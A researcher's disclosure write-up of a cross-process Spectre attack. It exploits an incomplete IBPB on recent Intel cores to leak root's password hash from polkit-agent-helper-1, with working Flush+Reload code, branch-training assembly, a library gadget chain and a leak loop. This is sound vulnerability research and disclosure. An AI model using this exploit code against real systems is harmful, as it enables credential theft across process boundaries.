Cross-Process Spectre Exploitation
By Johannes Wikner
October 18, 2024
I will walk through a cross-process Spectre attack I developed, partly while interning at Open Source Security, Inc.
Cross-Process Spectre
I have developed an exploit to demonstrate the impact of an incomplete Indirect Branch Prediction Barrier (IBPB) in Intel Golden Cove and Raptor Cove that I discovered. IBPB is meant to invalidate all indirect branch target predictions, which includes returns and jump/call instructions that take a memory or register operand (i.e., indirect branches). However, due to buggy microcode -- which appears to be an emergent problem in modern processors -- certain return target predictions are retained across IBPBs.
Back at ETH, Kaveh and I wrote a paper on this matter that we're publishing today along with this write-up. In the paper we also exploited a semantics issue of IBPB on certain AMD parts, leading to privileged memory disclosure on systems using IBPB-on-entry, which ironically is meant to be the more comprehensive mitigation alternative to the suspicious-looking, software-based SafeRET and retbleed thunk mitigations. In this write-up I will focus on the cross-process exploit, which is special for a couple of reasons.
- AFAIK, this is the first end-to-end cross-process Spectre exploit that does not exploit fake toy-programs.
- The overwhelming majority of software authors are unconcerned about cross-process Spectre attacks, indicated by the fact that none of them enable IBPB. The only exception I've seen is Google Chrome.
Unlike OS-kernels, which are packed with 1000s of lines of code to select the appropriate mitigations to fend off cross-privilege Spectre attacks, user programs do nothing --- even if they run as root and manage sensitive information (e.g., OpenSSH, sudo, polkit). With this work, I hope to convince software authors of such programs to use IBPB. However, even if they did use IBPB, they would have been vulnerable to the attack I'll explain anyway. Intel has patched the IBPB issue in a microcode update released earlier this year, so now they would be safe.
What IBPB?
Branch prediction state shared across processes running on the same core. While predictions may be restricted to the sibling thread and privilege domain they belong to, programs running in the same thread and privilege domain can influence each other's speculative control flow. To prevent this, IBPB should be used. IBPB is trigged from the privileged domain with a Model-Specific Register (MSR) write:
movq $0x49, %rcx ; MSR_IA32_PRED_CMD
movq $1, %rax ; PRED_CMD_IBPB
xor %rdx, %rdx
wrmsr
User programs can enable this via the prctl()
ABI. Besides user programs,
hypervisors like KVM will unconditionally use IBPB when switching vCPUs. It is
also likely -- however I didn't test it, and it is not explicitly documented --
that transitioning to SGX enclaves and to SMM imposes an implicit IBPB as well.
Before delving deeper, we'll cover some additional background on Spectre attacks.
How Spectre mis-speculations are exploited
Most of us are aware of at least some of the various Spectre vulnerabilities that modern processors are susceptible to. In a Spectre attack, the goal of the attacker is to leak unauthorized data by combining transient execution of incorrect control flow, caused by a branch misprediction, with side-channel analysis.
Branch misprediction
Branch prediction concerns conditional branch directions (e.g., taken vs. fall-through) and branch target addresses stored in microarchitectural core-local table-like datastructures. Our focus is on branch target address predictions. Intel processors are known to store these in Branch Target Buffers (BTBs) and TAGE-table-like structures. We do not need to understand how these work exactly. However, for a mental picture, I show an illustration of my own view below. Details about Intel's TAGE configuration I copied from the recent indirector paper. (I am not claiming that this resembles any actual implementations, but works for the purpose of this write-up)
IP[23:0]----------+
|
+----------v--------------+
| BTB |
|-------------------------|
Set 0 | Entry0 | ... | Entry 11 | +---------------------------------------------+
Set 1 | Entry0 | ... | Entry 11-+----->| BTB entry |
Set .. | | |---------------------------------------------|
Set 1K | Entry0 | ... | Entry 11 | | 8bit | 1bit | 2bit | 2bit | 1bit | 32bit |
+-------------------------+ | TAG | THREAD | PL | TYPE | OF | TARGET |
+--------------------------|------------------+
+-----------------+--------------------+----------------+
| | | |
"RETURN" ,--> "INDIRECT" ,-----> "DIRECT" <-, "CONDITIONAL"
| | | no-path-correl. | | |
+-----+ "RSBA" v | v Taken v
| RSB |-----' "TAGE"------' TARGET '------ PHT
+-----+ VVVV
IP[15:6]---------+-----------------------+----------------------+
| | |
BHB[67:0] BHB[131:0] BHB[387:0]
| | |
+--------v--------+ +--------v--------+ +-------v---------+
| TAGE1 | | TAGE2 | | TAGE3 |
|-----------------| |-----------------| |-----------------|
Set 0 | Entry0 | Entry1 | | Entry0 | Entry1 | | Entry0 | Entry1 |
Set 1 | Entry0 | Entry1 | | Entry0 | Entry1 | | Entry0 | Entry1 |
Set .. | .... | | .... | | .... |
Set 511 | Entry0 | Entry1 | | Entry0 | Entry1 | | Entry0 | Entry1 |
+----|------------+ +-----------------+ +-----------------+
| ^
| 194 branches hist----'
|
+----------v------------+
| TAGE entry |
|-----------------------|
| 10bit | 48bit | 2bit |
| TAG | TARGET | PL |
+-----------------------+
The BTB is a set-associative buffer that is indexed by the current Instruction
Pointer (IP), where each BTB-entry contains a static target and a type. If the
type is INDIRECT
, the (indirect) branch target prediction is in fact
dynamic and depends on the path-history. If the type is RETURN
, we should
receive the branch target from the Return Stack Buffer (RSB), which records the
upcoming return address for every encountered call
instruction. Storing
branch type information within the BTB allows the processor prepare a
prediction ahead of time, before instruction decode of its branch source has
completed, which can lead to
Phantom
speculation, which
SRSO exploits.
For indirect branch target prediction, the BTB becomes the 0th-level "tagless" TAGE table that is used when there is no correlation between path history and the branch. Otherwise, we will also consider the branch targets from higher-level TAGE-tables, picking the target that correlates with the longest path-history. Intel refers to this path-history as a Branch History Buffer (BHB). If the current BHB does not correlate with prediction in the TAGE tables, we fallback to the static target of the BTB.
For return target prediction, the BTB and TAGE entries may also become relevant
should the RSB not reference a valid target, for example because the RSB is
empty. If so, Intel's "bottom-less" RSB instead uses an alternate prediction
scheme (RSBA), which essentially means treating the BTB entry of the return as
if it had type INDIRECT
. For this to work, every time a return is executed,
it does not only update the RSB-state, but it also updates the indirect branch
predictor with return targets.
Additional information needs to be stored like the privilege level PL
, the
hardware thread THREAD
, and an overflow bit OF
, to determine if a direct
branch target crosses a 4 GiB boundary. I also imagine that information of
whether the branch is a CALL
might be recorded for faster RSB updates.
Side-channel analysis
What we most commonly see in Spectre attacks is that the attacker forces the victim to make a misprediction to transiently access unauthorized memory ("secrets") and use these in subsequent "secret"-dependent operations. The attacker can deduce the secret via a Flush+Reload (F+R) side channel. F+R is a comparably fast and low-noise side channel, but relies on memory sharing between the attacker and the victim. That is usually not a concern however. For example, all user memory is shared with the kernel via physmap, and user memory of non-writable sections of shared libraries are shared across all processes using the library (so you don't need to keep 1000 copies of glibc in memory for every running program ;))
Flush+Reload
Here is an F+R example. We introduce a "reloadbuffer" RB
, that contains a
number of "entries" that will be flushed and reloaded while measuring their
access times, revealing if the memory was fetched after it was flushed. Each
entry has a corresponding bin in a histogram RB_HIST
. When reloading, if
there is a cache hit for a particular entry (deduced by its access time), the
respective bin increments.
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <err.h>
/* it's generally better to hardcode hit/miss threshold than to compute it:
* 1. threshold becomes an immediate
* 2. calibrating requires a warmup to get stable value => slow.
* The following should detect LLC misses on all microarchs. */
#ifndef CACHE_MISS_THRES
#define CACHE_MISS_THRES 150
#endif
#ifndef RB_PTR
/* The Reload Buffel "RB" will take a hardcoded address so that it unlikely
* neighboring other data */
#define RB_PTR 0x13200000UL
#endif
#ifndef RB_STRIDE
/* Each cache line that we flush+reload is separated by 4096 bytes. Smaller
* strides are possible, but increases the chance of data cache prefetching =>
* noisy results.
*/
#define RB_STRIDE (1UL<<12)
#endif
#ifndef RB_SLOTS
/* If we're just testing if a side channel works, we are fine with just a few
* entries. To leak full bytes we would need 256 entries. */
#define RB_SLOTS 8
#endif
#ifndef SECRET
/* If we're just testing if a side channel works, we can aim at leaking a
* pre-determined "secret" value. */
#define SECRET 6
#endif
#ifndef RB_OFFSET
/* Rather than reloading a page-aligned address, we can pick something else.
* The first few CLs of a page are more likely prefetched than others. */
#define RB_OFFSET 0x180
#endif
#ifndef RB_HIST
/* We keep the results in a histogram with RB_SLOTS bins. We give it a fixed
* address too to make the reloading code position independent. */
#define RB_HIST 0x1800000
#endif
#ifndef mb
/* Wait for all memory operations to complete before continuing. */
#define mb() asm("mfence" ::: "memory");
#endif
typedef unsigned long u64;
typedef unsigned int u32;
typedef unsigned char u8;
/* Start measure */
static __always_inline u64 rdtsc(void) {
unsigned lo, hi;
asm volatile ("lfence\n\t"
"rdtsc\n\t"
: "=d" (hi), "=a" (lo));
return ((u64)hi << 32) | lo;
}
/* Stop measure */
static __always_inline u64 rdtscp(void) {
unsigned lo, hi;
asm volatile("rdtscp\n\t"
"lfence\n\t" : "=d" (hi), "=a" (lo)
:: "ecx");
return ((u64)hi << 32) | lo;
}
/**
* Reload the n cache lines used for flush+reload. If access time is below the
* threshold, increment the respective counter for the histogram/results.
*/
static __always_inline void reload_range(long base, long stride, int n, u64 *results) {
mb();
/* unroll the loop to avoid triggering data cache prefetcher. */
#pragma clang loop unroll(full)
for (u64 k = 0; k < n; ++k) {
/* semi-randomize the reload-order to avoid triggering data cache prefetcher */
u64 c = (k*7+5)&(n-1);
unsigned volatile char *p = (u8 *)base + (stride * c);
u64 t0 = rdtsc();
*(volatile unsigned char *)p;
u64 dt = rdtscp() - t0;
if (dt < CACHE_MISS_THRES) results[c]++;
}
}
/**
* Flush all the cachelines used for flush+reload.
*/
static __always_inline void flush_range(long start, long stride, int n) {
mb();
for (u64 k = 0; k < n; ++k) {
volatile void *p = (u8 *)start + k * stride;
asm volatile("clflushopt %0\n" ::"m"(*(const char *) p));
}
}
static u8* rb = (u8 *)RB_PTR;
static u64 *rb_hist = (u64 *)RB_HIST;
#define ROUND_2MB_UP(x) (((x) + 0x1fffffUL) & ~0x1fffffUL)
/* Prefer huge pages for the reloadbuffer => less noise. */
#define RB_SZ ROUND_2MB_UP((RB_SLOTS * RB_STRIDE) + 0x1000UL)
#define MMAP_FLAGS (MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED_NOREPLACE)
/**
* Convenience macros.
*/
#define rb_reset() memset(rb_hist, 0, RB_SLOTS * sizeof(*rb_hist))
#define rb_flush() flush_range(RB_PTR+RB_OFFSET, RB_STRIDE, RB_SLOTS);
#define rb_reload() reload_range(RB_PTR+RB_OFFSET, RB_STRIDE, RB_SLOTS, rb_hist);
/**
* Initialize flush+reload buffer referenced by (RB_PTR) and the results
* (RB_HIST).
*/
static void rb_init() {
/* Histogram, or simply put, the results. */
if (mmap((void *)RB_HIST, RB_SLOTS*sizeof(u64), PROT_READ | PROT_WRITE, MMAP_FLAGS|MAP_POPULATE, -1, 0) == MAP_FAILED) {
err(1, "rb_hist");
}
if (mmap((void *)RB_PTR, RB_SZ, PROT_READ | PROT_WRITE, MMAP_FLAGS, -1, 0) == MAP_FAILED) {
err(1, "rb");
}
/* Try to make this page a single 2MB page, to avoid TLB missing when
* reloading. */
madvise((void *)RB_PTR, RB_SZ, MADV_HUGEPAGE);
memset((void *)RB_PTR, 0xcc, RB_SZ); /* Make sure it isn't zero-page backed*/
}
#define ROUNDS 1000
int main(void) {
rb_init();
rb_flush();
rb_reset();
for (int i = 0; i < ROUNDS; ++i) {
rb_flush();
mb();
// touch something.
*(u8*) (RB_PTR+RB_OFFSET+SECRET*RB_STRIDE) = 12;
mb();
// we will be able to deduce what entry was touched.
rb_reload();
}
// print each bin.
for (int i = 0; i < RB_SLOTS; ++i) {
printf("%04ld ", rb_hist[i]);
}
printf("\n");
return 0;
}
The code should be compiled with clang, with optimizations enabled. Running it will result in the entry index defined by SECRET getting hot.
clang -Og -DSECRET=6 ./ex1.c -o ex1 && ./ex1
# > 0000 0000 0000 0000 0000 0000 1000 0000
clang -Og -DSECRET=4 ./ex1.c -o ex1 && ./ex1
# > 0000 0000 0000 0000 0999 0000 0000 0000
See how the results turn noisier if we for example reduce the stride and increase the number of entries (nb. must still be a power of 2).
clang -Og -DRB_SLOTS=32 -DRB_STRIDE=128L ./ex1.c -o ex1 && ./ex1
# > 0000 0000 0003 0002 0002 0000 0999 0000 0000 0001 0000 0000 0000 0000 0000 0000 0000 0000 0001 0000 0001 0001 0000 0001 0001 0000 0000 0001 0000 0000 0000 0000
Comparing the signal of the expected-hot entry with the other entries lets us infer how noisy the measurement is, and it lets us detect bugs. For example, if we forget the optimizations we would immediately see that something is not right.
clang ./ex1.c -o ex1 && ./ex1
# > 0999 1000 0996 0999 0125 0000 1000 0000
We will use F+R to observe indirect branch target misprediction.
Observe indirect branch misprediction
There is a key-difference between path-history-based and IP-based indirect branch target prediction. The IP-based one is using the BTB, which only has the lower 32 bits of the target. We can observe this with a simple F+R experiment.
Consider the following four snippets.
/* training branch source */
mk_snip(tr_src,
"mov $" STR(RB_PTR) ", %rax;"
"clflush (%rdi);"
"mfence ;"
#ifdef USE_RET
"push (%rdi) ;"
"ret ;"
#else
"jmp *(%rdi) ;"
#endif
);
/* victim branch source */
mk_snip(vi_src,
"mov $" STR(RB_PTR) ", %rax;"
"clflush (%rdi);"
"mfence ;"
#ifdef USE_RET
"push (%rdi) ;"
"ret ;"
#else
"jmp *(%rdi) ;"
#endif
);
/* This one will never execute */
mk_snip(tr_dst_IP,
/* signals "2", assumes RB_PTR in rax */
"mov " STR(RB_OFFSET + RB_STRIDE * 2)"(%rax), %rax;"
"lfence;"
"ret;"
);
mk_snip(tr_dst_BHB,
/* signals "4", assumes RB_PTR in rax */
"mov " STR(RB_OFFSET + RB_STRIDE * 4)"(%rax), %rax;"
"lfence;"
"ret;"
);
We assign these snippets the following code pointers.
init_snip(&tr_src_desc, 0x10000000000, tr_src);
/* v- bit 24 */
init_snip(&vi_src_desc, 0x01001000000, vi_src);
/* v-- bit 32 */
init_snip(&tr_dst_BHB_desc, 0x10020000000, tr_dst_BHB); /* Near the tr_src */
init_snip(&tr_dst_IP_desc, 0x01020000000, tr_dst_IP); /* Near the vi_src */
The BTB on Golden Cove and Raptor Cove only uses the lower 24 bits to address
the BTB. Hence, tr_src
and vi_src
resolve to the same BTB set and tag
(i.e., aliasing). After we execute tr_src
with a pointer to tr_dst_BHB
in
rdi
, a new prediction is created. The BTB however only contains the lower
32 bits of the target, while the full target is stored in the TAGE tables. So the
question is: after training tr_src
with tr_dst_BHB
as target, will
tr_dst_BHB
or tr_dst_IP
be predicted when we execute vi_src
?
Assuming the path-history leading up to vi_src
was different, maybe we it
predict tr_dst_IP
, once. However, the next time it will recognize the
mistake and avoid repeating it. To make it consistently mispredict
tr_dst_IP
or tr_dst_BHB
, we need to introduce path-history.
#define OP_RET 0xc3
#define BHB_AREA 0x4400000000L
static void init_bhb_area() {
if (mmap((void *)BHB_AREA, 1L<<24, PROT_READ|PROT_WRITE|PROT_EXEC, MMAP_FLAGS, -1, 0) == MAP_FAILED) {
err(1, "bhb_area");
}
}
static void random_bhb(u64 *bhb, int n) {
for (int i = 0; i < n; ++i) {
// some random sequence of return branches in the BHB_AREA
bhb[i] = BHB_AREA + (random()%(1L<<24));
*(u8 *) bhb[i] = OP_RET;
}
}
#define BHB_LEN 195
static u64 bhb[BHB_LEN];
static code_snip_t tr_src_desc, vi_src_desc, tr_dst_BHB_desc, tr_dst_IP_desc;
static int main(void) {
init_bhb_area();
srandom(getpid());
random_bhb(bhb, BHB_LEN);
init_snip(&tr_src_desc, 0x10000000000, tr_src);
init_snip(&tr_dst_BHB_desc, 0x10020000000, tr_dst_BHB);
init_snip(&vi_src_desc, 0x01001000000, vi_src);
init_snip(&tr_dst_IP_desc, 0x01020000000, tr_dst_IP);
#define ROUNDS 1000
for (int i = 0; i < ROUNDS; ++i) {
/* train */
asm(
"lea 33f(%%rip), %%rax ;" /* return address after training */
"push %%rax ;"
"push %1 ;" /* training source */
"mov %0, %%rbx ;" /* add the branch history*/
".rept " STR(BHB_LEN) ";"
" push (%%rbx) ;"
" add $8, %%rbx ;"
".endr ;"
"ret ;" /* go through BHB, then branch source */
"33: ;"
:: "r"(bhb), "r"(tr_src_desc.ptr), "D"(&tr_dst_BHB_desc.ptr) : "rax", "rbx");
rb_flush();
/* DO STUFF HERE */
/* run victim */
asm(
"lea 33f(%%rip), %%rax ;"
"push %%rax ;"
"mov %%rsp, %%rdi ;" /* vi_src will take us right back to "33:" */
"push %1 ;"
"mov %0, %%rbx ;"
".rept " STR(BHB_LEN) ";"
" push (%%rbx) ;"
" add $8, %%rbx ;"
".endr ;"
"ret ;"
"33: ;"
"add $8, %%rsp ;" /* re-adjust stack */
:: "r"(bhb), "r"(vi_src_desc.ptr): "rdi", "rax", "rbx");
rb_reload();
}
rb_print();
return 0;
}
If we run this, we get:
0000 0000 0000 0000 1000 0000 0000 0000 # jmp*, matching bhb
Unsurprisingly, thanks to the matching path-history leading up to vi_src
and
tr_src
, vi_src
mispredicts tr_dst_BHB
. If we instead randomize the BHB
before we run vi_src
, for example by inserting random_bhb(bhb, BHB_LEN);
before /* run victim */
, we get instead:
0000 0000 0930 0000 0001 0000 0000 0000 # jmp*, randomized bhb
In fact, because all TAGE table addressing depends on the most recent path history, only randomizing the last branch in the BHB yields the same result as the above.
So the misprediction now took tr_dst_IP
-- which is funny, because we never
executed that code in the program. We can now do the same thing with USE_RET
set to use returns and get.
0000 0000 0000 0000 0979 0000 0000 0000 # ret, matching bhb
0000 0000 0324 0000 0000 0000 0000 0000 # ret, randomized bhb
So we get the same result, but with a bit weaker signal. Many of you might find it strange to see what appears to be indirect branch target predictions on top of returns. However, this is an Intel feature that has many names, such as "bottom-less RSB", "RSBA", "RRSBA". Return Stack Buffer Alternate (RSBA) occurs when the RSB is empty. Because of our long path-history, consisting only of returns, the RSB is guaranteed empty when we hit the victim branch, hence we get RSBA. To be precise, on eIBRS systems, we call it Restricted RSBA (RRSBA) since the alternate predictions (not the RSB predictions) are protected by eIBRS (they are indirect branch predictions after all).
Bring in IBPB
We want to check whether IBPB handles these predictions. There's a super easy way (thanks to bsdaemon ;)) to trigger IBPB in Linux 6.2+, we can just do
prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, PR_SPEC_FORCE_DISABLE, 0, 0);
I was on an Ubuntu 5.15.0-97-generic while doing this work, so I did same using
a kernel module instead. Now, if we have an IBPB after training and test vi_src
for (1) path-based and (2) ip-based predictions for (a) indirect branch and (b)
return, we expect all predictions to be invalidated, therefore all signal to be gone. Instead however, we get something unexpected.
0000 0000 0000 0000 0000 0000 0000 0000 # ibpb, jmp*, (1,a)
0000 0000 0000 0000 0000 0000 0000 0000 # ibpb, ret, (1,b)
0000 0000 0000 0000 0000 0000 0000 0000 # ibpb, jmp*, (2,a)
0000 0000 0155 0000 0000 0000 0000 0000 # ibpb, ret, (2,b)
We are still getting signal from tr_dst_IP
, post IBPB! It took a while to conclude
that this was not a software bug. In fact, this is a microcode bug! The
prediction is retained across the IBPB. But what should we do with this
interesting effect?
Build a cross-process Spectre leak
Two things that IBPB is used for are context switches and vCPU switches. While it would be cool (and certainly not impossible) to leak information from a co-tenant VM with this primitive, it appears easier to prove the impact of the vulnerability by targeting context switches between processes.
The funny thing is however that nobody appears to have built a real cross-process Spectre attack in the past. So in order to prove that IBPB bugs are a real problem, we must first build cross-process Spectre exploit. One that IBPB should protect against.
Another funny thing is that the only victim candidate I found that was using IBPB was Google Chrome. But we are already deep down in a mess, and descending deeper, into javascript hell, would not do my sanity well.
Instead we will target a SUID program that lets you authenticate as root via
a password prompt. After a bit of poking around, I decided that polkit appeared
to be a perfect victim, specifically the /usr/libexec/polkit-agent-helper-1
that is present on most Linux machines.
polkit-agent-helper-1
is not meant to be run by humans, but reading its
source code shows that it takes two arguments: the user to authenticate as (we
will use root, of course) and a "cookie", which we don't really care about.
Secondly, stdin
must be anything but a tty for it to work. So we can run it
like:
while true; sleep 2; do echo -n A; done | /usr/libexec/polkit-agent-helper-1 root asdfadsf
# > PAM_PROMPT_ECHO_OFF Password:
Since the attacker can obtain of the same binaries and libraries as the vicitm
(e.g. via apt repos), they can debug this program with full privileges locally.
So we run strace
on it:
while true; sleep 2; do echo -n A; done | sudo strace -eopenat,read /usr/libexec/polkit-agent-helper-1 root asdfadsf
# > read(3, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 2669
# > openat(AT_FDCWD, "/etc/shadow", O_RDONLY|O_CLOEXEC) = 3
# > read(3, "root:$6$HGU6y/YF5$rf5na/CbCxzKWR"..., 4096) = 1651
# > PAM_PROMPT_ECHO_OFF Password:
# > read(0, "A", 4096) = 1
# > read(0, "A", 4096) = 1
# > read(0, "A", 4096) = 1
# > read(0, ^Cstrace: Process 334359 detached
# > <detached ...>
This is fantastic and weird at the same time! It reads the password hashes from
/etc/shadow
before even taking the password. It appears that libpam
, which
manages the authentication, does this to check that the password is valid and
hasn't expired. It also stores the password hash in memory inside the pam
context.
We want to hijack a return in this process by first training it in our attacker
process, then trigger the victim process to run by sending a character to its
stdin
.
To figure out which returns are exploitable, we can use Intel PT (via perf
) to create
a --call-ret
trace.
I recorded the function graph from my process over the context-switch to the polkit helper, who is `read`-ing my process' characters via an `fgets` call in its pam conversation.
There are three returns in the victim, all in glibc, that could be exploited if predicted with RRSBA: read
,
_IO_file_underflow
, and _IO_default_uflow
. Unfortunately, they are not
predicted with RSBA, because the call-depth imposed by read
in the victim is
too shallow. However, the victim accepts any kind of stdin
, except a tty. So
instead of attaching a normal pipe to interact with the victim's stdin
, we
can attach a socket
. Because sockets are much more complicated to read from,
the read
call-depth of the victim now exceeds the RSB capacity, leading to
exploitable RRSBA-predicted returns for all three returns.
We take a look at _IO_default_uflow
in gdb
and we what find is surprising!
Breakpoint 1, 0x00007ffff7c46db0 in __GI__IO_default_uflow (fp=<optimized out>) at ./libio/genops.c:366
366 ./libio/genops.c: No such file or directory.
0x00007ffff7c46daf <__GI__IO_default_uflow+79>: 5d pop %rbp
=> 0x00007ffff7c46db0 <__GI__IO_default_uflow+80>: c3 ret
0x00007ffff7c46db1 <__GI__IO_default_uflow+81>: 0f 1f 80 00 00 00 00 nopl 0x0(%rax)
(gdb) i r
rax 0x41 65
rbx 0x0 0
rcx 0x7ffff7ccd7e2 140737350784994
rdx 0x555555596301 93824992502529
rsi 0x555555596300 93824992502528
rdi 0x0 0
rbp 0xa 0xa
rsp 0x7fffffffe148 0x7fffffffe148
r8 0x0 0
r9 0x555555596300 93824992502528
r10 0x7ffff7dd4270 140737351860848
r11 0x246 582
r12 0x7ffff7dd3aa0 140737351858848
r13 0x0 0
r14 0x7fffffffe1f0 140737488347632
r15 0x1ff 511
rip 0x7ffff7c46db0 0x7ffff7c46db0 <__GI__IO_default_uflow+80>
eflags 0x202 [ IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) x/s $rsi
0x555555596300: "Aoot:$6$HGU6y/YF5$rf5na/CbCxzKWRjrkPYDb1oN5ZI7TSxVs8Epz79q9jUyZnIqmmIGYd4lzOVa8I4yyGQ2SSjyd0op5mujCdX4Q.:19755:0:99999:7:::\ndaemon:*:19235:0:99999:7:::\nbin:*:19235:0:99999:7:::\nsys:*:19235:0:99999:7::"...
As we're reading entered characters from the password prompt, the stream buffer
that stdin
receives password input onto (here 'A'
) already references the
secret that we want to leak, and it's referenced by three different registers!
Even better, the last entered character sits in rax
, which can act as an
index to target a specific byte of the secret. How did that happen?
Because the password hashes were read right before presenting the password
prompt, the most recently freed memory was the stream buffer of the file handle
for /etc/shadow
. When we immediate allocate a new stream buffer for stdin
,
which is of the same size as the previous one, malloc
recycles that memory.
So the memory that rsi
, rdx
, and rsi
reference is in fact simply
uninitialized memory that happened to have held secrets just before.
But how should we leak the secret?
Gadget chain
We know that we can hijack a return and make it speculatively execute a target
of our choice in the victim's address space. The speculated target needs to
read a byte of the secret using rax
as index. Then we need to transmit it
to the attacker over a F+R side channel. Because read-only sections of shared
libraries are shared in physical memory, the idea is to use the executable
section of glibc, referenced by rcx
and rip
, as the "reloadbuffer". So we
want to make a secret-dependent memory access to rcx
or rip
, so that we can
later deduce the secret in the attacker's process.
I realized that it is not going to be easy to find code in the victim's address space (marked "present", as we can't manage #PFs under speculation) that loads part of the secret from memory and transmits it (via F+R). Not in one single gadget. However, maybe it is possible to stitch together a chain of gadgets that does one of each necessary operation and trigger a series of nested return mispredictions to speculatively execute all of them. At this point, I was mildly exhausted, so I reached out to the very encouraging and enthusiastic security folks at Google. They told me that they would be happy to find me a ROP-gadget chain -- they are a search company after all! Indeed, a few days later Chani Jindal sent me a perfectly looking gadget chain:
0x7ffff68efa69: movzx eax, byte [rax+rdx] ; ret ; (/usr/lib/x86_64-linux-gnu/libicuuc.so.70.1)
0x7ffff7cef5b7: rol eax, 0x08 ; ret ; (/usr/lib/x86_64-linux-gnu/libc.so.6)
0x7ffff75f45ec: shl rax, 0x02 ; ret ; (/usr/lib/x86_64-linux-gnu/libzstd.so.1.4.8)
0x7ffff73af74b: mov al, byte [rcx+rax] ; ret ; (/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4)
The first one reads a byte of the secret using the attacker-controllable rax
as index, with zero-extension so the rest of rax
gets zapped. The secret then
gets left-rotated 8 times and left-shifted another 2 times and finally used as
index in a memory load of rcx
.
Exploit!
The procedure works as follows.
The attacker forks a new process and pins it and itself to the same hardware
thread and spawn the victim program. Sharing hardware thread allows the
attacker and victim share branch prediction and cache state.
The attacker attaches a socket to the stdin
of the victim and waits for the password prompt.
To train the gadget chain in the victim, we just execute construct a ROP-gadget
chain, made up of NOPs 0x90
and RETs 0xc3
, at aliasing addresses.
#define LIBC_AX 0x7ffff7be0000
#define LIBICUUC_AX 0x7ffff68eb000
#define LIBZSTD_AX 0x7ffff75ee000
#define LIBPCRE2_8_AX 0x7ffff73ad000
#define GADGET(start, size) \
{ \
start, start + (size - 1) \
}
static struct bhb_bb bhb_path_b[] = {
// __GI__IO_default_uflow
GADGET(LIBC_AX + 0x065d96, 27), //
// movzbl (%rax,%rdx,1),%eax ; ret \x0F\xB6\x04\x10\xC3
GADGET(LIBICUUC_AX + 0x005a69, 5),
// rol $8, %eax; ret \xC1\xC0\x08\xc3
GADGET(LIBC_AX + 0x10e5b7, 4),
// shl $2, %rax ; ret \x48\xC1\xE0\x02\xc3
GADGET(LIBZSTD_AX + 0x45ec, 5),
// mov (%rcx,%rax,1), %al ; ret \x8A\x04\x01\xC3
GADGET(LIBPCRE2_8_AX + 0x74b, 4)
};
#define BHB_B_LEN (sizeof(bhb_path_b) / sizeof(*bhb_path_b))
void init_gadgetchain(long off)
{
for (int i = 0; i < BHB_B_LEN; ++i) {
struct bhb_bb *bb = &bhb_path_b[i];
memset(_ptr(F(bb->start_adr - off)), 0x90, bb_len(bb));
memcpy(_ptr(F(bb->end_adr - off)), "\xc3", 1);
}
}
void train_gadgetchain(u64 off)
{
static long bbstack[6];
for (int i = 0; i < BHB_B_LEN; ++i) {
bbstack[i] = F(bhb_path_b[i].start_adr - off);
}
void finland();
bbstack[BHB_B_LEN] = (long)finland;
bbstack[0] = F(bhb_path_b[0].start_adr - off);
asm("mov %%rsp, %%r15 \n"
"lea 8(%0), %%rsp \n"
"jmp *(%0) \n"
"finland: \n" /* come back here */
"mov %%r15, %%rsp \n" ::"r"(bbstack)
: "r15", "rax", "memory");
}
To trigger with the victim, we send a byte to it corresponding to the byte offset we want to leak of the secret.
static struct timespec req = {0,0};
int runsu_poke(child_proc_t *child, char c) {
int ret = write(child->input, &c, 1);
clock_nanosleep(CLOCK_REALTIME, 0, req, NULL);
return ret;
}
The condensed procedure becomes something similar to:
static const u64 rb_start = (u64)read + 18; /* rcx in victim points to read<+18> */
for (int sec_idx = 1; sec_idx < 110; ++sec_idx) {
while (guess == -1) {
train_gadgetchain(off);
flush_range(rb_start, RB_STRIDE, RB_SLOTS);
runsu_poke(runsu, sec_idx-1);
reload_range(rb_start, RB_STRIDE, RB_SLOTS, results);
for (int i = 1; i < RB_SLOTS; ++i) {
if (results[i] > 1) {
guess = i;
break;
}
}
}
secret[sec_idx] = guess;
}
Does this work? Not at all! First of all, we have to win a race condition. We
need to have enough time to execute the entire gadget chain, before the real
return target comes back from the program stack. I was stuck as this point for
an awful long time. I attempted evicting the program stack from a sibling
thread, however it didn't work. I attempted to prefetch the code of the
respective gadgets by targeting preceding returns, which also did not work.
Because the shl
gadget is not strictly necessary, I removed it.
Because the results were extremely noisy, rather than flushing and reloading an entire range, I tried to only flush and reload a single entry, matching the 'o' of 'root' in the password hash. If any of the tweaking would work, it should be able to detect this byte.
To slow down the victim, I introduced random memory noise from a victim thread
by simply running an old stress test tool stress -m 1
. I would occasionally
see what appeared to be signal from the 'o' in this way. However, the results
were still noisy. It appeared that certain instance of the victim process were
more noisy than others and those instances wouldn't be able to leak anything.
So I would test each victim instance if it was able to leak 'o' before I would
use it. This way, I was able to leak information -- however at an incredibly low
speed! But that is a different problem, we only wanted to conclude that it works!
Behold: https://www.youtube.com/watch?v=VYEVcj-vnbs
What about ASLR?
I skipped this for brevity. However, we do derandomize ASLR, and incredibly efficiently too! We derandomize the lower 32 bits of the address space, which is sufficient: we only need the lower 24 bits to hijack a particular branch, and only the lower 32 bits are recorded in the BTB prediction anyway. To derandomize, we use a "reversed" branch target injection attack, in the sense that we let the victim train a branch in the attacker process. The attacker then guesses around until it finds a branch that gets predicted with a prediction from the victim, thereby learning about its address space layout. For details on the ASLR exploit, I refer you to the paper.